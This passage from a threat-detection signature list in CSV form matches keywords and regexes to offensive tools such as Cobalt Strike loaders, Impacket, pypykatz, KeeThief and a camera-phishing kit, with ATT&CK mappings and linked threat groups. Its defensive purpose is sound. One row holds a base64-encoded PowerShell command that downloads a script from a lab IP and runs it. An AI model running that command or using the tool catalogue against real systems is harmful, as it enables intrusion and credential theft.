loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50196" 
"*KABHAGUAdAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAE4AYQBtAGUAIABBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAbgBhAG0AZQApACAALQBjAG8AbgB0AGEAaQBuAHMAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQAuAG4AYQBtAGUA*",".{0,1000}KABHAGUAdAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAE4AYQBtAGUAIABBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAbgBhAG0AZQApACAALQBjAG8AbgB0AGEAaQBuAHMAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQAuAG4AYQBtAGUA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","50197" "*KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA*",".{0,1000}KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - 
T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#base64","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","50198" "*kali-*.deb*",".{0,1000}kali\-.{0,1000}\.deb.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50200" "*kali-anonsurf*",".{0,1000}kali\-anonsurf.{0,1000}","offensive_tool_keyword","kali-anonsurf","Anonsurf will anonymize the entire system under TOR using IPTables. It will also allow you to start and stop i2p as well.","T1568 - T1102 - T1055 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Und3rf10w/kali-anonsurf","1","1","#linux","N/A","N/A","10","1681","478","2025-02-17T03:54:56Z","2015-08-19T04:57:16Z","50201" "*KaliLadon.*",".{0,1000}KaliLadon\..{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50202" "*kali-linux*.7z*",".{0,1000}kali\-linux.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50203" 
"*kali-linux*.img*",".{0,1000}kali\-linux.{0,1000}\.img.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50204" "*kali-linux*.iso*",".{0,1000}kali\-linux.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50205" "*kali-linux-*.torrent*",".{0,1000}kali\-linux\-.{0,1000}\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50206" "*kali-linux-*.vmdk*",".{0,1000}kali\-linux\-.{0,1000}\.vmdk.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50207" "*kali-linux-*.vmwarevm*",".{0,1000}kali\-linux\-.{0,1000}\.vmwarevm.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50208" "*kali-linux-*.vmx*",".{0,1000}kali\-linux\-.{0,1000}\.vmx.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50209" 
"*kali-linux-*-installer-amd64.iso*",".{0,1000}kali\-linux\-.{0,1000}\-installer\-amd64\.iso.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50210" "*kali-linux-*-installer-everything-amd64.iso.torrent*",".{0,1000}kali\-linux\-.{0,1000}\-installer\-everything\-amd64\.iso\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50211" "*kali-linux-*-live-everything-amd64.iso.torrent*",".{0,1000}kali\-linux\-.{0,1000}\-live\-everything\-amd64\.iso\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50212" "*kali-linux-*-raspberry-pi-armhf.img.xz*",".{0,1000}kali\-linux\-.{0,1000}\-raspberry\-pi\-armhf\.img\.xz.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50213" "*kali-linux-*-virtualbox-amd64.ova*",".{0,1000}kali\-linux\-.{0,1000}\-virtualbox\-amd64\.ova.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50214" 
"*kali-linux-*-vmware-amd64.7z*",".{0,1000}kali\-linux\-.{0,1000}\-vmware\-amd64\.7z.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50215" "*kalilinux/kali-rolling*",".{0,1000}kalilinux\/kali\-rolling.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","50216" "*kalilinux/kali-rolling*",".{0,1000}kalilinux\/kali\-rolling.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50217" "*kali-rolling main contrib non-free*",".{0,1000}kali\-rolling\smain\scontrib\snon\-free.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","50218" "*kalitorify*",".{0,1000}kalitorify.{0,1000}","offensive_tool_keyword","kalitorify","kalitorify is a shell script for Kali Linux which use iptables settings to create a Transparent Proxy through the Tor Network. 
the program also allows you to perform various checks like checking the Tor Exit Node (i.e. your public IP when you are under Tor proxy). or if Tor has been configured correctly checking service and network settings.","T1090 - T1132 - T1046 - T1016","TA0003 - TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/brainfucksec/kalitorify","1","0","#linux","N/A","N/A","10","1113","238","2024-04-18T07:11:44Z","2016-02-03T20:42:46Z","50219" "*kaluche/bloodhound-quickwin*",".{0,1000}kaluche\/bloodhound\-quickwin.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful information from the combo BloodHound + Neo4j","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","AD Enumeration","6","3","239","26","2025-04-04T05:11:46Z","2021-02-16T16:04:16Z","50220" "*kancotdiq/wpaf*",".{0,1000}kancotdiq\/wpaf.{0,1000}","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Vulnerability Scanner","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","N/A","1","80","15","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z","50221" "*karendm/ADHunt*",".{0,1000}karendm\/ADHunt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","50222" "*karing.martin+confusercoc@gmail.com*",".{0,1000}karing\.martin\+confusercoc\@gmail\.com.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - 
T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","50223" "*Karkas66/CelestialSpark*",".{0,1000}Karkas66\/CelestialSpark.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","1","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","50224" "*Karmaleon.py*",".{0,1000}Karmaleon\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","50225" "*karmaSMB.py*",".{0,1000}karmaSMB\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50226" "*KasRoudra/CamHacker*",".{0,1000}KasRoudra\/CamHacker.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","N/A","10","","N/A","","","","50228" "*kasroudrard@gmail.com*",".{0,1000}kasroudrard\@gmail\.com.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","#email","N/A","10","","N/A","","","","50229" "*katoolin*toollist.py*",".{0,1000}katoolin.{0,1000}toollist\.py.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","1","#linux","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","50230" "*katoolin3.py*",".{0,1000}katoolin3\.py.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","1","#linux","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","50231" "*KatzSystemArchitecture*",".{0,1000}KatzSystemArchitecture.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","50232" "*KaynInject.x64.exe*",".{0,1000}KaynInject\.x64\.exe.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","50234" "*KaynInject.x86.exe*",".{0,1000}KaynInject\.x86\.exe.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - 
T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","50235" "*KAYNINJECT_KAYNINJECT_H*",".{0,1000}KAYNINJECT_KAYNINJECT_H.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","50236" "*KaynLdr.x64.dll*",".{0,1000}KaynLdr\.x64\.dll.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","50237" "*KAYNLDR_KAYNLDR_H*",".{0,1000}KAYNLDR_KAYNLDR_H.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","50238" "*KaynStrike.x64.bin*",".{0,1000}KaynStrike\.x64\.bin.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","50239" "*KaynStrike.x64.exe*",".{0,1000}KaynStrike\.x64\.exe.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start 
address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","50240" "*KBDPAYLOAD.dll*",".{0,1000}KBDPAYLOAD\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","N/A","10","","N/A","","","","50241" 
"*KCMTicketFormatter.py*",".{0,1000}KCMTicketFormatter\.py.{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","1","N/A","N/A","7","1","37","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z","50244" "*KcpPassword.cs*",".{0,1000}KcpPassword\.cs.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","50246" "*kdcdump2john.py*",".{0,1000}kdcdump2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50247" "*KDot227/SomalifuscatorV2*",".{0,1000}KDot227\/SomalifuscatorV2.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","1","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","50248" "*kdstab * /CHECK*",".{0,1000}kdstab\s.{0,1000}\s\/CHECK.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50249" "*kdstab * /CLOSE*",".{0,1000}kdstab\s.{0,1000}\s\/CLOSE.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 